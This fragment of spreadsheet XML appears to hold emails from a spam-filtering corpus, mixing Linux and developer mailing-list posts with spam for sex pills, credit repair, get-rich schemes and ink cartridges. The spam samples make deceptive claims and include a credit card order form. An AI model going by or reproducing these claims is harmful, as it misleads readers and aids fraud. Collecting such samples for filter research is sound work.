 &gt; Unfortunately, an unattributed patch may or may not be a contributed patch
 &gt; as I'm not always good about recording the source of a patch.  I suspect
 &gt; this patch may have been contributed from someone that uses the
 &gt; auto-pack or auto-sort features, which I don't use.  This change should be
 &gt; tested against those features.
 &gt; 
 &gt; This whole folder scanning area is super delicate, as Chris is discovering.
 &gt; I wish I had a little more time right now to wrap my head around the issues
 &gt; .
 &gt; It is good that another pair of eyes is looking at the code, and I hope I
 &gt; left some clues in the comments about why things are being done.  If we
 &gt; do change things, or remove calls, we may want to leave a note that says
 &gt; 
 &gt; # Used to be a Scan_Folder call here, but it was removed for the
 &gt; # following reason...
 Unfortunately, there are few comments in this part of the code.  I haven't 
 been helping that situation much, although there are some comments in the new 
 sequence stuff that I wrote.  I have cleaned up a bit of code so that 
 it's a little more clear what it's doing and a little less delicate.  I also 
 gratuitously renamed some variables for clarity.
 My last few bug fixes were purely problems that I created in my own 
 patches and I can't blame anyone but myself.
 As I'm avoiding real work, I may clean up a little bit more (and probably 
 break a few things as well ;-).
 Chris
 -- 
 Chris Garrigues                 http://www.DeepEddy.Com/~cwg/
 virCIO                          http://www.virCIO.Com
 716 Congress, Suite 200
 Austin, TX  78701		+1 512 374 0500
   World War III:  The Wrong-Doers Vs. the Evil-Doers.
 --==_Exmh_724731589P
 Content-Type: application/pgp-signature
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: Exmh version 2.2_20000822 06/23/2000
 iD8DBQE9PFUbK9b4h5R0IUIRAk/OAJ90HUYnMoAhyeIUTuHB7FnwZxl/LQCeIHH7
 A+FDAIyH8bUPCObpEiimZMg=
 =8FKS
 -----END PGP SIGNATURE-----
 --==_Exmh_724731589P--
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Jump start desire in both men and women 7893vBvF1-278ZKCc8-17
</t>
  </si>
  <si>
    <t xml:space="preserve">8800JWXS6-165kYbB8203GssW1-200otHp6418l36
 SPRING BLOW OUT SALE
 GREAT SEX IN THE BOTTLE
 For men &amp; women
 Guaranteed to restore the urge! 
 And enhance the pleasure and health!
 Two for price of one 
 http://81.9.8.40/cgi-bin/herbal/index.cgi?10394
 Exclude yourself, john195615221@yahoo.com
 5363PIMF9-885VmHQ8619nrwV6-745XQHk5559Isl38
</t>
  </si>
  <si>
    <t xml:space="preserve">[Jeremy Hylton]
 &gt; Here's clarification of why I did:
 That's pretty much what I had guessed.  Thanks!  One more to try:
 &gt; First test results using tokenizer.Tokenizer.tokenize_headers()
 &gt; unmodified. 
 &gt; ...
 &gt; Second test results using mboxtest.MyTokenizer.tokenize_headers().
 &gt; This uses all headers except Received, Data, and X-From_.
 &gt; ...
 Try the latter again, but call the base tokenize_headers() too.
</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks for this information.  I gave Alsa a try, couldn't figure out how
 to enable digital out, although I'm sure if I put enough time into it,
 could have gotten it working.  Also when playing mp3s in analog mode,
 every time I switched between mp3s there was a bit of static.  Noticed a
 new distribution geared towards audio applications, AGNULA
 (http://www.agnula.org/) uses Alsa as well.  Seems though the latest
 open source emu10k1 drivers (SBLive! 5.1) work fair enough.  Anyone else
 experience these problems with Alsa?  Are there alot of people on this
 list using Alsa?
 Regards,
 Lance
 On Sat, 2002-08-24 at 17:45, Angles Puglisi wrote:
 &gt; FYI, This is how I make my ALSA rpms ... some people on the (null) list did not
 &gt; realize it was pretty easy.
 &gt; 
 &gt; btw, I do this lot since I've upgraded from RH7.3 to Limbo1 to Limbo2 to Null all in
 &gt; a week (probably).
 &gt; 
 &gt; forward - original mail:
 &gt;   From "Angles Puglisi" &lt;angles@aminvestments.com&gt;
 &gt;   Date 08/24/2002 - 06:38:03 pm
 &gt;   Subject Re: When are we going to get....
 &gt; ----
 &gt; 
 &gt; From:  Angles  Puglisi &lt;angles@aminvestments.com&gt;
 &gt; To: limbo-list@example.com
 &gt; Subject: Re: When are we going to get....
 &gt; Date: 24 Aug 2002 22:40:40 +0000
 &gt; 
 &gt; OK, I do this every time I update a kernel.
 &gt; 
 &gt; The 1st time I added ALSA, I tried a non-root rpom build but the DEV things were not
 &gt; made. Other than that, I bet you could do non-root. The following can be scripted
 &gt; easily.
 &gt; 
 &gt; 1. get (a) alsa-drivers, (b) alas-lib, and (c) alsa-utils tarballs (if upgrading the
 &gt; kernel then you probably have them from your last install).
 &gt; 2. unpack them somewhere.
 &gt; 3. for each of them, go to the top directory of the unpacked tarball, and do
 &gt; ../configure, then look in (I'm going by memory) TOPDIR/utils/* you should see a spec
 &gt; file there. Do this for the 3 tarballs and you get 3 spec files.
 &gt; 
 &gt; 4. put the source tarballs in SOURCES and the spec files in SPECS, go in order from
 &gt; a, b, then c, doing
 &gt;  "rpmbuild -ba SPECS/alsa-[X].spec; rpm -Uvh RPMS/i386/alsa-[X].rpm"
 &gt; 
 &gt; 5. do that in order for the 3 spec files and you have just installed the alsa
 &gt; drivers on your system. The 1st time you do this you need to put the correct stuff
 &gt; in your modules.conf file (may take some research) then you get the alsa driver and
 &gt; OSS compat capabilities, or you can choose not to use the OOS compat stuff.
 &gt; 
 &gt; Script making the spec, then building and upgrading, as above, and you have
 &gt; "no-sweat" ALSA.
 &gt; 
 &gt; NOTE: the (null) rpmbuild did take some tweaking, it does a check for files in the
 &gt; buildroot that you don't specify in your files section. In this case there is an
 &gt; extra file (going by memory) "/include/sys/asound.h". Add a line at the end on the
 &gt; "install" section of the spec file to delete that file and you are good to go.
 &gt; 
 &gt; Gordon Messmer (yinyang@eburg.com) wrote*:
 &gt; &gt;
 &gt; &gt;On Fri, 2002-08-23 at 03:41, Matthias Saou wrote:
 &gt; &gt;&gt;
 &gt; &gt;&gt; Probably when Red Hat Linux gets a 2.6 kernel ;-) Until then, a few places
 &gt; &gt;&gt; provide good quality alsa packages, but indeed you still have to patch and
 &gt; &gt;&gt; recompile your kernel.
 &gt; &gt;
 &gt; &gt;Not so.  Alsa is build-able independently of the kernel.
 &gt; &gt;
 &gt; &gt;&gt; Maybe some day I'll try ALSA (never done it yet), and that day you can
 &gt; &gt;&gt; expect all needed packages to appear on freshrpms.net :-)
 &gt; &gt;
 &gt; &gt;I'd be interested in working with you on that if you want those
 &gt; &gt;packages.
 &gt; &gt;
 &gt; &gt;
 &gt; &gt;
 &gt; &gt;
 &gt; &gt;_______________________________________________
 &gt; &gt;Limbo-list mailing list
 &gt; &gt;Limbo-list@redhat.com
 &gt; &gt;
 &gt; 
 &gt; --
 &gt; That's "angle" as in geometry.
 -- 
 :
 ####[ Linux One Stanza Tip (LOST) ]###########################
 Sub : Extracting lines X to Y in a text file         LOST #261
 Use sed ... Syntax: [$sed -n 'X,Yp' &lt; textfile.txt]. Following
 will extract lines 5-10 from textin.fil to textout.fil ... 
 $sed -n '5,10p' &lt; textin.fil &gt; textout.fil
 ####&lt;bish@nde.vsnl.net.in&gt;####################################
 :
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">intersectedness: i'd be surprised if beberg ever had a BLOWjob he liked. i
 mean, it would have involved OTHERS, less EVOLVED others.
 :-)
 gg
 -----Original Message-----
 From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of
 Russell Turpin
 Sent: Saturday, September 07, 2002 3:07 PM
 To: fork@spamassassin.taint.org
 Subject: RE: Selling Wedded Bliss (was Re: Ouch...)
 CDale:
 &gt;I guess [Geege] doesn't want everyone to know about all the kinky sex she
 &gt;and I have had.
 Yeah, like I'm going to believe that without
 seeing the photos. Next, you'll be telling me
 that Beberg found a job he likes.
 _________________________________________________________________
 Join the worlds largest e-mail service with MSN Hotmail.
 http://www.hotmail.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Clean your Bad Credit ONLINE?                  C
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multipart message in MIME format.
 --E688BA2004D84DB2B62AB45B06DBFFE2
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;HEAD&gt; 
 &lt;TITLE&gt;creditfix&lt;/TITLE&gt; 
 &lt;/HEAD&gt; 
 &lt;BODY BGCOLOR=3D#FFFFFF TEXT=3D#000000 LINK=3D#000000 VLINK=3D#000000 ALIN=
 K=3D#000000&gt; 
 &lt;BR&gt; 
 &lt;CENTER&gt; 
 &lt;TABLE WIDTH=3D400 BORDER=3D0 CELLPADDING=3D0 CELLSPACING=3D1 BGCOLOR=3D99=
 9999&gt; 
 &lt;TR&gt; 
 &lt;TD&gt; 
 &lt;TABLE BORDER=3D0 CELLPADDING=3D4 CELLSPACING=3D0 BGCOLOR=3D#FFFFFF BACKGR=
 OUND=3Dhttp://365.sunshinehui.com/creditfix/email/background_arrow.gif WID=
 TH=3D400&gt; 
 &lt;TR&gt; 
 &lt;TD&gt;&lt;A HREF=3Dhttp://365.sunshinehui.com/creditfix/?cid=3D1590&amp;mid=3D17700=
 &gt;&lt;IMG SRC=3Dhttp://365.sunshinehui.com/creditfix/email/banner_email.gif BO=
 RDER=3D0&gt;&lt;/A&gt;&lt;BR&gt; 
 &lt;IMG SRC=3Dhttp://365.sunshinehui.com/creditfix/email/line.gif&gt;&lt;BR&gt;&lt;BR&gt; 
 &lt;A HREF=3Dhttp://365.sunshinehui.com/creditfix/?cid=3D1590&amp;mid=3D17700&gt;&lt;im=
 g src=3Dhttp://365.sunshinehui.com/creditfix/email/body_email.gif alt=3D""=
  border=3D"0"&gt;&lt;/A&gt; 
 &lt;BR&gt; 
 &lt;FONT FACE=3DVerdana SIZE=3D2&gt;Thank You,&lt;/FONT&gt;&lt;BR&gt; 
 &lt;IMG SRC=3Dhttp://365.sunshinehui.com/creditfix/email/thankyou.gif&gt; 
 &lt;BR&gt; 
 &lt;/TD&gt; 
 &lt;/TR&gt; 
 &lt;TR&gt; 
 &lt;TD&gt; 
 &lt;IMG SRC=3Dhttp://365.sunshinehui.com/creditfix/email/line.gif&gt;&lt;BR&gt;&lt;br&gt; 
 &lt;FONT FACE=3DVerdana SIZE=3D1&gt;Your email address was obtained from a purch=
 ased 
 list, Reference # 1590-17700.&amp;nbsp;&amp;nbsp;If you wish to unsubscribe from t=
 his list, please 
 &lt;a href=3D"http://61.172.250.143/remove/remove1.html"&gt;Click here&lt;/a&gt; and e=
 nter your 
 name into the remove box. If you have previously 
 unsubscribed and are still receiving this message, you may email our 
 &lt;a href=3D"mailto:nospamws@yahoo.com?Subject=3DAbuse Report"&gt;Abuse Control=
  Center&lt;/a&gt;, 
 or call 1-888-763-2497, or write us at: NoSpam, 6484 Coral Way, 
 Miami, FL, 33155".&lt;/FONT&gt;&lt;br&gt; 
 &lt;BR&gt; 
 &lt;IMG SRC=3Dhttp://365.sunshinehui.com/creditfix/email/line.gif&gt;&lt;BR&gt; 
 &lt;FONT FACE=3DVerdana SIZE=3D1&gt;&amp;copy; 2002 Web Credit Inc. All Rights Reser=
 ved&lt;/FONT&gt;&lt;FONT FACE=3D"Verdana" SIZE=3D"1"&gt;.&lt;/FONT&gt;&lt;/TD&gt; 
 &lt;/TR&gt; 
 &lt;/TABLE&gt; 
 &lt;/TD&gt; 
 &lt;/TR&gt; 
 &lt;/TABLE&gt; 
 &lt;/CENTER&gt; 
 &lt;BR&gt; 
 &lt;/BODY&gt; 
 &lt;/BODY&gt;
 &lt;/HTML&gt;
 --E688BA2004D84DB2B62AB45B06DBFFE2
 Content-Type: text/plain
 Content-Disposition: inline
 Opening Minds
 Wayne County Public Schools
 Goldsboro, NC
 --E688BA2004D84DB2B62AB45B06DBFFE2--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Over $100,000 Per Year Possible On The Net!  No Illegal MLM Junk! Time:11:43:57 PM
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;xbody&gt;
 &lt;hr width = "100%"&gt;
 &lt;center&gt;&lt;font size = "+1" color =
 "blue"&gt;&lt;b&gt;Over $100,000 The First Year, Most Of That While I Was Sleeping!  Will Work For Anyone, Anywhere!&lt;/font&gt;&lt;/b&gt;&lt;p&gt;
 &lt;table&gt;&lt;Tr&gt;&lt;td&gt;
       &lt;p align="center"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;&lt;font color="#000000" size="4" face="Arial"&gt;Imagine 
         The Perfect Business&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
       &lt;ul&gt;
         &lt;li&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;You 
           Can Run It From Home...Or From Anywhere With A Telephone Connection&lt;/b&gt;&lt;/font&gt;&lt;/li&gt;
       &lt;/ul&gt;
       &lt;ul&gt;
         &lt;li&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#000099"&gt;&lt;b&gt;&lt;font color="#000000"&gt;There 
           Is No Large Investment To Get Started&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/li&gt;
       &lt;/ul&gt;
       &lt;ul&gt;
         &lt;li&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;You 
           Can Put Everything On Auto-Pilot&lt;/b&gt;&lt;/font&gt;&lt;/li&gt;
       &lt;/ul&gt;
       &lt;ul&gt;
         &lt;li&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;&lt;font color="#000000"&gt;There 
           Is No Face-To-Face Selling Involved&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/li&gt;
       &lt;/ul&gt;
       &lt;ul&gt;
         &lt;li&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;There 
           Is No Inventory To Buy Or Ship&lt;/b&gt;&lt;/font&gt;&lt;/li&gt;
       &lt;/ul&gt;
       &lt;ul&gt;
         &lt;li&gt;&lt;font color="#000099" face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;&lt;font color="#000000"&gt;You 
           Can Even Work In Your Underwear If You Want To (No More Ties!)&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/li&gt;
       &lt;/ul&gt;
       &lt;ul&gt;
         &lt;li&gt;&lt;font color="#000099" face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;&lt;font color="#000000"&gt;If You Are Willing To Put 1 Or 2 Hours In To Start, This Can Be A Mint!  &lt;font color="red"&gt;If You Can't Spare A Few Hours &amp; The Money For A Movie For Two &amp; A Snack, Don't Go Any Further!&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/li&gt;
       &lt;/ul&gt;
       &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;Sound good? 
         It Is! &lt;/font&gt;&lt;/p&gt;
       &lt;p align="center"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;tt&gt;&lt;font color="#CC0000"&gt;&lt;b&gt;&lt;font color="#000000" size="4" face="Arial"&gt;The 
         Cash Flow System That Brought In Over $115,467.00 In The First Year&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/tt&gt;&lt;/font&gt;&lt;/p&gt;
       &lt;p align="left"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;&lt;font color="blue"&gt;My 
         Internet Business brought in over $115,467.21 last year and I'm going 
         to show you exactly how you can do the same thing. But I'm not going 
         to stop there...I'm going to give you FIVE Internet businesses you can 
         start right now...TODAY!&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;br&gt;&lt;font size = "+1"&gt;Please Visit Our
 Website&lt;p&gt;&lt;/font&gt;
 And Place Your &lt;font color = "red"&gt; &lt;b&gt;Order
 TODAY!&lt;/b&gt; &lt;/font&gt;&lt;a target="_blank"  href =
 "http://www.geocities.com/instant_net2002/"&gt;&lt;b&gt;&lt;font
 size="5"&gt;CLICK HERE&lt;/font&gt;&lt;/b&gt; &lt;/a&gt;&lt;p&gt;&amp;nbsp;&lt;p&gt;
 &lt;/center&gt;
 To Order by postal mail, please send to the below address.  Or order via fax from our
 24 hour fax line:  734-574-6455
 &lt;p&gt;
 Make payable to Instant Internet Empire.
 &lt;br&gt;&lt;br&gt;
 Instant Internet Empire&lt;br&gt;
 238 East Southern Ave.&lt;br&gt;
 Springfield, Ohio  45505&lt;br&gt;
 &lt;br&gt;
 ___Instant Internet Empire $42.95&lt;br&gt;
 Add $3.00 Processing Fee To Your Order.
 &lt;br&gt;&lt;br&gt;
 *****&lt;br&gt;
 &lt;b&gt;&lt;font color="red"&gt;Important Credit Card Information! Please Read Below!&lt;/b&gt;&lt;/font&gt;
  &lt;br&gt;&lt;br&gt;
 *     Credit Card Address, City, State and Zip Code, must match
       billing address to be processed. 
 &lt;br&gt;&lt;br&gt;
 CHECK____  MONEYORDER____  VISA____ MASTERCARD____ AmericanExpress___
 Debt Card___
 &lt;br&gt;&lt;br&gt;
 Name_______________________________________________________&lt;br&gt;
 (As it appears on Check or Credit Card)
 &lt;br&gt;&lt;br&gt;
 Address____________________________________________________&lt;br&gt;
 (As it appears on Check or Credit Card)
 &lt;br&gt;&lt;br&gt;
 ___________________________________________________&lt;br&gt;
 City,State,Zip(As it appears on Check or Credit Card)
 &lt;br&gt;&lt;br&gt;
 ___________________________________________________&lt;br&gt;
 Country
 &lt;br&gt;&lt;br&gt;
 ___________________________________________________&lt;br&gt;
 (Credit Card Number)
 &lt;br&gt;&lt;br&gt;
 Expiration Month_____  Year_____
 &lt;br&gt;&lt;br&gt;
 ______________________________________________&lt;br&gt;
 Phone Number
 &lt;br&gt;&lt;br&gt;
 ___________________________________________________________&lt;br&gt;
 Email Address:  All Information Sent Via Email Address (Please Write Neat)!
 &lt;br&gt;&lt;br&gt;
 ___________________________________________________________&lt;br&gt;
 Authorized Signature
 &lt;p&gt;
 &lt;b&gt;
 To Be Removed From Our Mailing List, Simply Put The Word "Remove" In The Subject Line, And Send To The Email Address Below.  &lt;font color="red"&gt;For Those Who Wish To Be Removed, Please Don't Complain To The Remove Name ISP.  A Remove List Can't Be Make, If You Have It Shut Down!&lt;/font&gt;&lt;/b&gt;
 &lt;p&gt;
 Email Address:  &lt;a href="mailto:takemeoff2002@hotpop.com"&gt;REMOVE&lt;/a&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Discover InfoByTel Today!
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: LOOK !  Y O U  are a W I N N E R  here !  -  Don't miss out  !  !                                6674
</t>
  </si>
  <si>
    <t xml:space="preserve">
 F I N A L    N O T I C E !
 NEW PROGRAM pays you IMMEDIATELY!
 Get STARTED TODAY 
 with USA's fastest growing BUSINESS OPPORTUNITY
 NOT MLM!
 Here you get paid LARGE checks the same day!
 Use the Internet to make money 24 hours a day!
 I made unbelievable $21,000 in June! 
 .. and will prove it, if you wish!
 Everybody can do this!
 - A U T O P I L O T   SYSTEM ! - 
 OUR System generates all LEADS for YOU!
 MINIMUM cash outlay gets you STARTED TODAY!
 Program available in US and Canada ONLY!
 Are you ready to CHANGE YOUR LIFE ?
 To receive FREE INFO about this LAST OFFER,
 please send an email to:     RickBellrist@excite.com
 with "SEND INFO" in the subject line!!
 (do NOT click REPLY!)
 To remove, please send an email with "REMOVE" 
 in the subject line to:      RickBellrist@excite.com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t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: hi
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Thomas wrote :
 &gt; I wanted to find out who tried recompiling a working apt rpm for (null)
 &gt; or psyche.  I would like to get good GStreamer packages done by monday
 &gt; when it's released.
 I have a working apt 0.5.4cnc7 package for Red Hat Linux 8.0. It will be
 available at the same second the distribution will, and so will a complete
 apt repository already including quite a few of my packages updated for Red
 Hat Linux 8.0.
 I didn't want to say all this before Monday, but as the new release already
 leaked from many places, and official statements made about it, it
 shouldn't be a big deal :-/
 I'll keep you all posted on Monday! They'll even be a big apt-related
 surprise! ;-))))
 Matthias
 -- 
 Matthias Saou                                World Trade Center
 -------------                                Edificio Norte 4 Planta
 System and Network Engineer                  08039 Barcelona, Spain
 Electronic Group Interactive                 Phone : +34 936 00 23 23
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; er, i understood you until you reached the above. Maybe its my lack of 
 &gt; PHP but why would a variable name _need_ to end with [] ?
 &gt; 
 &gt; With most languages you parse the submitted form data and should come 
 &gt; out with either variables or an array / hash, which you then work with 
 &gt; and name whatever you like.
 IIRC, if the query string contains
 varname=FIRST&amp;varname=SECOND
 then PHP will create a variable called "varname" with result SECOND. 
 However, if the query string contains
 varname[]=FIRST&amp;varname[]=SECOND
 then PHP will create an array with varname[1]==FIRST and varname[2]==SECOND
 There are other ways to get the data from the HTTP request, and I guess 
 I'll do that if it turns out to simplify the script that creates the 
 form; but as i understand it that's the "official" way to get data from 
 a SELECT MULTIPLE using PHP.
 Dave
 _______________________________________________
 Webdev mailing list
 Webdev@linux.ie
 http://www.linux.ie/mailman/listinfo/webdev
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAdev] [Bug 840] spam_level_char option change/removal
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --sHrvAb52M6C8blB9
 Content-Type: text/plain; charset=us-ascii
 Content-Disposition: inline
 Content-Transfer-Encoding: quoted-printable
 On Fri, Sep 06, 2002 at 10:09:19AM -0700, bugzilla-daemon@hughes-family.org=
  wrote:
 &gt; another (or would look terrible).  Let's just use a letter.  If
 &gt; aesthetics are your concern, I think an "x" will look just fine.
 "x" is fine, but let's not take out the config option.  if people really
 want to have it be something else, we shouldn't hinder them.
 --=20
 Randomly Generated Tagline:
 "And the next time you consider complaining that running Lucid Emacs
  19.05 via NFS from a remote Linux machine in Paraguay doesn't seem to
  get the background colors right, you'll know who to thank."
  (By Matt Welsh)
 --sHrvAb52M6C8blB9
 Content-Type: application/pgp-signature
 Content-Disposition: inline
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: For info see http://www.gnupg.org
 iD8DBQE9eOxDAuOQUeWAs2MRAuH1AKD8heTyLbbAWWkpWyjY6k4JwKhOMgCg4C++
 rl8B1iVlvS/M0aFW6DubyQA=
 =BibY
 -----END PGP SIGNATURE-----
 --sHrvAb52M6C8blB9--
 -------------------------------------------------------
 This sf.net email is sponsored by: OSDN - Tired of that same old
 cell phone?  Get a new here for FREE!
 https://www.inphonic.com/r.asp?r=sourceforge1&amp;refcode1=vs3390
 _______________________________________________
 Spamassassin-devel mailing list
 Spamassassin-devel@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/spamassassin-devel
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Attn: Buying ink online is the way to go!           12083
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv=3D"Content-Language" content=3D"en-us"&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Dwindows-=
 1252"&gt;
 &lt;meta name=3D"GENERATOR" content=3D"Microsoft FrontPage 4.0"&gt;
 &lt;meta name=3D"ProgId" content=3D"FrontPage.Editor.Document"&gt;
 &lt;title&gt;Do you Have an Inkjet or Laser Printer?&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;div align=3D"left"&gt;
   &lt;table border=3D"2" width=3D"480" height=3D"55" bordercolor=3D"#FFFFFF" =
 bordercolorlight=3D"#FFFF00" bordercolordark=3D"#000080" bgcolor=3D"#FF000=
 0"&gt;
     &lt;tr&gt;
       &lt;td width=3D"465" height=3D"49" align=3D"center" bgcolor=3D"#CC0000"=
  bordercolor=3D"#C0C0C0" style=3D"border-right-style: solid; border-right-=
 color: #C0C0C0"&gt;&amp;nbsp;
         &lt;div align=3D"center"&gt;
           &lt;center&gt;
           &lt;table border=3D"1" width=3D"99%" height=3D"11" bordercolor=3D"#=
 000000"&gt;
             &lt;tr&gt;
               &lt;td width=3D"100%" height=3D"5" align=3D"center" bgcolor=3D"=
 #FFFFFF" style=3D"color: #FFFFFF; font-size: 10pt; font-weight: bold"&gt;&lt;b&gt;&lt;=
 font face=3D"Verdana" color=3D"#FF0000" size=3D"4"&gt;Do
         you Have an Inkjet or Laser Printer?&lt;/font&gt;&lt;/b&gt;
               &lt;/td&gt;
             &lt;/tr&gt;
           &lt;/table&gt;
           &lt;/center&gt;
         &lt;/div&gt;
         &lt;p&gt;&lt;font face=3D"Verdana" size=3D"4"&gt;&lt;b&gt;&lt;font color=3D"#FFFFFF"&gt;Ye=
 s? Then we can &lt;/font&gt;&lt;font color=3D"#FFFFCC"&gt;SAVE&lt;/font&gt;&lt;font face=3D"Ver=
 dana" size=3D"3" color=3D"#FFFFFF"&gt;
         you &lt;/font&gt;&lt;font color=3D"#FFFFCC"&gt;$$$&lt;/font&gt;&lt;font face=3D"Verdana=
 " size=3D"3" color=3D"#FFFFFF"&gt; Money!&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
         &lt;p&gt;&lt;b&gt;&lt;font size=3D"3" color=3D"#FFFFFF"&gt;&lt;font face=3D"Verdana"&gt;Ou=
 r High Quality Ink &amp; Toner Cartridges come
         with a money-back guarantee,&lt;/font&gt; &lt;font face=3D"Verdana"&gt;a 1-yea=
 r
         Warranty*, and get &lt;/font&gt;&lt;/font&gt;&lt;i&gt;&lt;font face=3D"Verdana" size=3D=
 "3" color=3D"#FFFFCC"&gt;&lt;u&gt;FREE 3-Day SHIPPING&lt;/u&gt;!*&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;
         &lt;p&gt;&lt;b&gt;&lt;font face=3D"Verdana" size=3D"3" color=3D"#FFFFFF"&gt;and best=
  of all...They Cost
         &lt;/font&gt;&lt;font face=3D"Verdana" color=3D"#FFFFCC"&gt;&lt;font size=3D"3"&gt; =
 up to 80% &lt;/font&gt; &lt;i&gt;&lt;u&gt;&lt;font face=3D"Verdana" color=3D"#FFFF99" size=3D"4=
 "&gt;Less&lt;/font&gt;&lt;/u&gt;&lt;/i&gt;
         &lt;/font&gt;
         &lt;font face=3D"Verdana" size=3D"3" color=3D"#FFFFFF"&gt;
         than
         Retail Price!&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
         &lt;div align=3D"center"&gt;
           &lt;center&gt;
           &lt;table border=3D"1" width=3D"99%" height=3D"11" bordercolor=3D"#=
 000000"&gt;
             &lt;tr&gt;
               &lt;td width=3D"100%" bgcolor=3D"#FFFFFF" align=3D"center" styl=
 e=3D"color: #FFFFFF" bordercolor=3D"#000000"&gt;
         &lt;p&gt;&lt;b&gt;&lt;a style=3D"color: #000000; font-weight: bold" href=3D"http:=
 //www.superink.net/"&gt;&lt;font face=3D"Verdana" color=3D"#FF0000" size=3D"4"&gt;&lt;=
 a style=3D"color: #000000; font-weight: bold"&gt;-&amp;gt;&lt;/a&gt;&lt;/font&gt;&lt;/a&gt;&lt;font fa=
 ce=3D"Verdana" color=3D"#FF0000" size=3D"4"&gt;&lt;a style=3D"color: #000000; fo=
 nt-weight: bold"&gt;-&amp;gt;&lt;/a&gt;&lt;/font&gt;&lt;a style=3D"color: #000000; font-weight: =
 bold" href=3D"http://211.141.66.70:5811/"&gt;&lt;font face=3D"Verdana" color=3D"=
 #FF0000" size=3D"4"&gt;
         Click here
         to visit Our Website! &amp;lt;- &lt;/font&gt;&lt;/a&gt;&lt;/b&gt;&lt;/p&gt;
               &lt;/td&gt;
             &lt;/tr&gt;
           &lt;/table&gt;
           &lt;/center&gt;
         &lt;/div&gt;
         &lt;p&gt;&lt;u&gt;&lt;font color=3D"#FFFFFF" size=3D"4" face=3D"Arial"&gt;or Call us=
  Toll-Free
         anytime at 1-800-758-8084&lt;/font&gt;&lt;/u&gt;
         &lt;p&gt;&lt;font size=3D"1" face=3D"Arial" color=3D"#C0C0C0"&gt;*90-day warra=
 nty on remanufactured
         cartridges. Free shipping on orders over $40&lt;/font&gt;&lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
 &lt;/div&gt;
 &lt;br&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;div align=3D"left"&gt;
           &lt;table border=3D"1" width=3D"480" height=3D"42" bgcolor=3D"#CC00=
 00" bordercolor=3D"#FFFF00"&gt;
             &lt;tr&gt;
               &lt;td width=3D"480" height=3D"36" align=3D"center" style=3D"fo=
 nt-family: Palatino Linotype; font-size: 8pt; color: #FFFFFF"&gt;&lt;font face=3D=
 "Tahoma"&gt;&lt;font size=3D"1" color=3D"#FFFFFF"&gt;You
                 are receiving this special offer because you have provided=
  permission to receive email communications regarding special
                 online promotions or offers. If you feel you have received=
  this
                 message in error, or wish to be removed from our subscribe=
 r
                 list, &lt;/font&gt; &lt;a href=3D"mailto:print4@btamail.net.cn" sty=
 le=3D"color: #FF0000"&gt;&lt;font size=3D"1" color=3D"#000000"&gt;Click HERE&lt;/font&gt;=
 &lt;/a&gt;
                 &lt;font size=3D"1" color=3D"#FFFFFF"&gt;
                 and then click send, and you will be removed within three =
 business days.
